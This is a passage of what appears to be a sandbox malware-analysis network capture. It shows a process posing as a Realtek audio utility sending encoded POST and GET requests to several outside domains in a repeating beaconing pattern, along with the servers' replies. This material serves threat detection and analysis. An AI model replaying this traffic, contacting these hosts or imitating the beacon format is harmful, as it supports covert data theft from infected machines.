                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.ogbos88.cyou
                                                                          Referer: http://www.ogbos88.cyou/kj1o/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBRTbC6voPYgjDQZ4VQvNbvCBi7xZtTT1Y1n/uv2EFvFQcNswbGq9ZaXXA6qu2FSF4UUZttkbkeeA6fYznZEPZRsKtjv0NuZ5FSHvX74lEvS0R7F+ZXZSU/cUIsruZi9x1rwYWhqx6Sylqe0napphzIWyR3GG1zkbvK/NWxrxLdFd7k=
                                                                          Jan 9, 2025 16:49:22.705631018 CET | 810 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 09 Jan 2025 15:49:22 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 167
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Thu, 09 Jan 2025 16:49:22 GMT
                                                                          Location: https://ogbos88vip.click
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SOr8e6FdN1Qyj%2BcCNtfpmMkItzs5HRvnf1IoKlygVkMrEEd1STekFYwjEeQ%2FGgzKBwxrO2Egmst%2BfymHE94TZixKwGj9C8LW8fKhJkZ%2Ff9r0I5yLeJyhs%2Bh3qCStVSPK9Xv%2B"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Vary: Accept-Encoding
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff593b07c6f89f4-ORD
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          27 | 192.168.11.20 | 49772 | 104.21.13.141 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:49:25.216981888 CET | 6445 | OUT | POST /kj1o/ HTTP/1.1
                                                                          Host: www.ogbos88.cyou
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.ogbos88.cyou
                                                                          Referer: http://www.ogbos88.cyou/kj1o/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:49:25.217051029 CET | 1519 | OUT
                                                                          Data Ascii: IiMs45d2v7Bv7GfR4O3a6SD2pGrPCXtG2pcmHGO3d6Ws/Njk82KVsB7gRr1/e70C7O5MS+2Az7eHImcVd6atRytEqjpXIKuFfOSMVdwjZEBUgWKozbjZa+3KFlpXcyLerv4hQ8mFl3SZFCBAyBMsNt6Z/g00aNagUOHljodm/cbwUenUw2PKisswrATMXxNaeT01qpRuJSweI1e461U/lZ2d+WIHOISR3a58rZTf9zkmsuVawu7
                                                                          Jan 9, 2025 16:49:25.349929094 CET | 804 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 09 Jan 2025 15:49:25 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 167
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Thu, 09 Jan 2025 16:49:25 GMT
                                                                          Location: https://ogbos88vip.click
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZOQPvpzEdHa6bjdhSbZ4jHvGgr0tfNGAt0rgBsEwAOAXCc%2Bt3PcF1ae8hPCz7mxdAMdkJp6zD4hODrYVsHX8TfDkPJ%2BJ93QJcpYlWh%2F7RmYXcEbC4LSSJAxXlNHPUbkaOwdl"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Vary: Accept-Encoding
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff593c10c37eaf5-ORD
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          28 | 192.168.11.20 | 49773 | 104.21.13.141 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:49:27.869154930 CET | 530 | OUT | GET /kj1o/?lV=aFAzn/LT2mOAaNQHP98soQbFSeChigB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQskl/LrNJEccoBVqSJKs=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.ogbos88.cyou
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:49:27.995160103 CET | 779 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Thu, 09 Jan 2025 15:49:27 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 167
                                                                          Connection: close
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Thu, 09 Jan 2025 16:49:27 GMT
                                                                          Location: https://ogbos88vip.click
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lrz2%2B4VGEB6BfONc8adXj5YUqj4yDQOyNCLmS9K6myhmgVffyj8jDRTJgXA2OqYv8jQWf3OjhH9VbnCnkC04oo2tRIpEYNt1N2%2BzeEd3J4ge7wNqSaVQJPElDJC9fuioaxQz"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8ff593d19af5f862-ORD
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          29 | 192.168.11.20 | 49774 | 136.243.64.147 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:49:42.366858006 CET | 822 | OUT | POST /cxj4/ HTTP/1.1
                                                                          Host: www.100millionjobs.africa
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.100millionjobs.africa
                                                                          Referer: http://www.100millionjobs.africa/cxj4/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=tIFi+WNsJjQFmHIPGadKlZCadffY3ejZA+gwHvvOmIEuT5NAFYT1fe92Loy/QXepozQsrO3BzwpsybE1zv/vqgU+DzV8I7Ev5EPLLMvGTQF1laaC4DvP5EbMLkyQmCXMkcR3/18Us/+HT9dfEUPqC2oSrJs+G1lAToQHhIU4Yx28vNiJu51xAcp0LoKpg6ymkA==
                                                                          Jan 9, 2025 16:49:42.591762066 CET | 493 | IN | HTTP/1.1 302 Found
                                                                          Date: Thu, 09 Jan 2025 15:49:42 GMT
                                                                          Server: Apache
                                                                          Location: http://maximumgroup.co.za/cxj4/
                                                                          Content-Length: 290
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          30 | 192.168.11.20 | 49775 | 136.243.64.147 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:49:45.118617058 CET | 842 | OUT | POST /cxj4/ HTTP/1.1
                                                                          Host: www.100millionjobs.africa
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.100millionjobs.africa
                                                                          Referer: http://www.100millionjobs.africa/cxj4/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Data Ascii: lV=tIFi+WNsJjQFkn4PF9BKk5CdBvfY5+jdA+8wHuqLl+UuWrVAGd/1ee92EIy6UXeyozcSrPLBzxNsye41zYToqwU8CDV6HbEv5EPLLIOhTQt1lumCpRXQ6EbDcUyQxSWLkcRF/3E6s92HT+JfEFPpVGoIkptHAlkOcJZww40lfSPIn7vTzLBVDP1GPYzBi4z95HyrfiPuz0VQQRtxDqGNsAo=
                                                                          Jan 9, 2025 16:49:45.344302893 CET | 493 | IN | HTTP/1.1 302 Found
                                                                          Date: Thu, 09 Jan 2025 15:49:45 GMT
                                                                          Server: Apache
                                                                          Location: http://maximumgroup.co.za/cxj4/
                                                                          Content-Length: 290
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          31 | 192.168.11.20 | 49776 | 136.243.64.147 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:49:47.892793894 CET | 2578 | OUT | POST /cxj4/ HTTP/1.1
                                                                          Host: www.100millionjobs.africa
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.100millionjobs.africa
                                                                          Referer: http://www.100millionjobs.africa/cxj4/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:49:47.892848015 CET | 5413 | OUT
                                                                          Data Ascii: 1XBYPuE/fDonJBTaRYF0+jSwzHdj9rhkLLp1dDzGyuTDgBokIHZPECiw0tlNjC9Eja8g8fIyT9AKvFGWCacNWBzXqNchRYYYsiKS6m3nUSXbzkDTSXvAdb7wyqwIwnfUEbwqOUHjtu+mWEuJpvF2LumPOwEhQwvL2q8aQbGlSlHLu4EAFgIba/6jRw/PPKn6GJn0zRIQnq0IEjlRxhexKOiyodDogzplmsg6DjC7SoedaNoAPQT
                                                                          Jan 9, 2025 16:49:48.122936010 CET | 493 | IN | HTTP/1.1 302 Found
                                                                          Date: Thu, 09 Jan 2025 15:49:48 GMT
                                                                          Server: Apache
                                                                          Location: http://maximumgroup.co.za/cxj4/
                                                                          Content-Length: 290
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          32 | 192.168.11.20 | 49777 | 136.243.64.147 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:49:50.645917892 CET | 539 | OUT | GET /cxj4/?lV=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.100millionjobs.africa
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:49:50.871047974 CET | 775 | IN | HTTP/1.1 302 Found
                                                                          Date: Thu, 09 Jan 2025 15:49:50 GMT
                                                                          Server: Apache
                                                                          Location: http://maximumgroup.co.za/cxj4/?lV=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA=&LSbaT=zft4LoBw
                                                                          Content-Length: 433
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/?lV=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA=&amp;LSbaT=zft4LoBw">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          33 | 192.168.11.20 | 49778 | 202.95.11.110 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:49:56.550620079 CET | 801 | OUT | POST /wbfy/ HTTP/1.1
                                                                          Host: www.mirenzhibo.net
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mirenzhibo.net
                                                                          Referer: http://www.mirenzhibo.net/wbfy/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:49:56.893767118 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                                          Server: nginx
                                                                          Date: Thu, 09 Jan 2025 15:49:56 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: d404 Not Found0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          34 | 192.168.11.20 | 49779 | 202.95.11.110 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:49:59.368778944 CET | 821 | OUT | POST /wbfy/ HTTP/1.1
                                                                          Host: www.mirenzhibo.net
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mirenzhibo.net
                                                                          Referer: http://www.mirenzhibo.net/wbfy/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:49:59.710071087 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                                          Server: nginx
                                                                          Date: Thu, 09 Jan 2025 15:49:59 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: d404 Not Found0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          35 | 192.168.11.20 | 49780 | 202.95.11.110 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:50:02.209969997 CET | 2578 | OUT | POST /wbfy/ HTTP/1.1
                                                                          Host: www.mirenzhibo.net
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.mirenzhibo.net
                                                                          Referer: http://www.mirenzhibo.net/wbfy/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:50:02.210005999 CET | 5392 | OUT
                                                                          Jan 9, 2025 16:50:02.566278934 CET | 190 | IN | HTTP/1.1 400 Bad Request
                                                                          Server: nginx
                                                                          Date: Thu, 09 Jan 2025 15:50:02 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: d404 Not Found0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          36 | 192.168.11.20 | 49781 | 202.95.11.110 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:50:05.043828011 CET | 532 | OUT | GET /wbfy/?lV=Xeeb3ImT6ZQQytgHl6ygbKjk3RvUis2KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPQegMjeyq5uNXxHJj0c=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.mirenzhibo.net
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:50:05.566122055 CET | 995 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Thu, 09 Jan 2025 15:50:05 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Data Ascii: 322<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="Baiduspider" content="noindex, nofollow"><title></title> <script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><body style="padding: 0;margin: 0;"><div><script rel="nofollow" src="http://www.zbywl.com/js.js"></script></div></body></html>0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          37 | 192.168.11.20 | 49782 | 76.223.54.146 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:50:10.911880016 CET | 810 | OUT | POST /kgjj/ HTTP/1.1
                                                                          Host: www.nextlevel.finance
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.nextlevel.finance
                                                                          Referer: http://www.nextlevel.finance/kgjj/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:50:11.048551083 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          38 | 192.168.11.20 | 49783 | 76.223.54.146 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:50:14.596770048 CET | 830 | OUT | POST /kgjj/ HTTP/1.1
                                                                          Host: www.nextlevel.finance
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 219
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.nextlevel.finance
                                                                          Referer: http://www.nextlevel.finance/kgjj/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:50:14.734087944 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          39 | 192.168.11.20 | 49784 | 76.223.54.146 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:50:17.275460005 CET | 2578 | OUT | POST /kgjj/ HTTP/1.1
                                                                          Host: www.nextlevel.finance
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 7367
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.nextlevel.finance
                                                                          Referer: http://www.nextlevel.finance/kgjj/
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:50:17.275537014 CET | 5401 | OUT
                                                                          Data Ascii: 6JcwAu4dp02u1VLJFy+7HiTGdh7vOFf3G7Vi5VhTkdgF59B7K0TCyKqsEBWhShw5WVH3MWZPSWsU8PxgmkTxyhA6pTmoK3ADfYHB9hemsPRjqtg7pZIJtHQa2+GKh2vROXlLqd/ZQ8hjwbjWf72Iu1GTXfBqoQ7p1pzItAxu7u5EERYHHE2Xf02khSecW+b0yUzUhMMbx7QdkSnRQvmMOJdoJUcK2FTpk+XjlDdeT7GoeWz1DAh
                                                                          Jan 9, 2025 16:50:17.419385910 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                          content-length: 0
                                                                          connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          40 | 192.168.11.20 | 49785 | 76.223.54.146 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:50:19.942708015 CET | 535 | OUT | GET /kgjj/?lV=m0PzV+DL9MdhQie6uq/amrvVR35Q8Tf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZYXkuMLBntBAotkskh0=&LSbaT=zft4LoBw HTTP/1.1
                                                                          Host: www.nextlevel.finance
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                          Jan 9, 2025 16:50:20.090145111 CET | 374 | IN | HTTP/1.1 200 OK
                                                                          content-type: text/html
                                                                          date: Thu, 09 Jan 2025 15:50:20 GMT
                                                                          content-length: 253
                                                                          connection: close
                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?lV=m0PzV+DL9MdhQie6uq/amrvVR35Q8Tf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZYXkuMLBntBAotkskh0=&LSbaT=zft4LoBw"}</script></head></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          41 | 192.168.11.20 | 49786 | 103.106.67.112 | 80 | 7540 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jan 9, 2025 16:50:25.494653940 CET | 795 | OUT | POST /k29t/ HTTP/1.1
                                                                          Host: www.furrcali.xyz
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en
                                                                          Connection: close
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 199
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Origin: http://www.furrcali.xyz
                                                                          Referer: http://www.furrcali.xyz/k29t/
